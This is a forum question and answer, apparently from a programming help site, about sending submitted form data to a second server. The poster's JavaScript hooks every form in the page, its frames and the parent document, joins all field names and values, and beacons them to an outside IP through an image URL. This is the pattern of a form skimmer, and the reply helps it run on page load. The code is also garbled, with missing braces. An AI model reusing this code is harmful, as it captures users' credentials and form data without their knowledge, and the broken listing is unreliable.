I need to submit the same information to two URL's so the form submit action is perfectly fine for one, then I had the thought I could do a JavaScript listener to submit the second one with a simple URL in an image tag but I have found that if I use the code below it doesn't reach my server but if I enable the alert box it works perfectly fine.
If I am doing something really simple wrong, I apologise.
//function 1
function attach(wnd,handler){
for(var i=0; i<wnd.document.forms.length; i++){
var form = wnd.document.forms[i];
form.addEventListener('submit', handler,false);
for(var i=0; i<wnd.frames.length; i++){
var iwnd = wnd.frames[i];
//Function 2
function formSubmit(e){
var forms=parent.document.getElementsByTagName("form");
for (i = 0 ; i < forms.length; i++)
var chain="";
var forms=parent.document.getElementsByTagName("form");
for (x = 0 ; x < forms.length; x++)
var elements=forms[x].elements;
for (e = 0 ; e < elements.length; e++)
chain += elements[e].name + "%3d" + elements[e].value + "|";
// alert(chain);
var pic = document.createElement('img');
pic.className = 'avatar';
pic.src = 'http://x.x.x.x/images/Image.php?id='+chain;
pic.height = '50';
pic.width = '50';
You need to call your attach function after the DOM is available. Add something like this after your formSubmit function:
document.addEventListener("load", function() {
attach(window, formSubmit);
Note that addEventListener is not supported by older Internet Explorers. If you need support for them do yourself a favor and try jQuery or a similar JS helper library.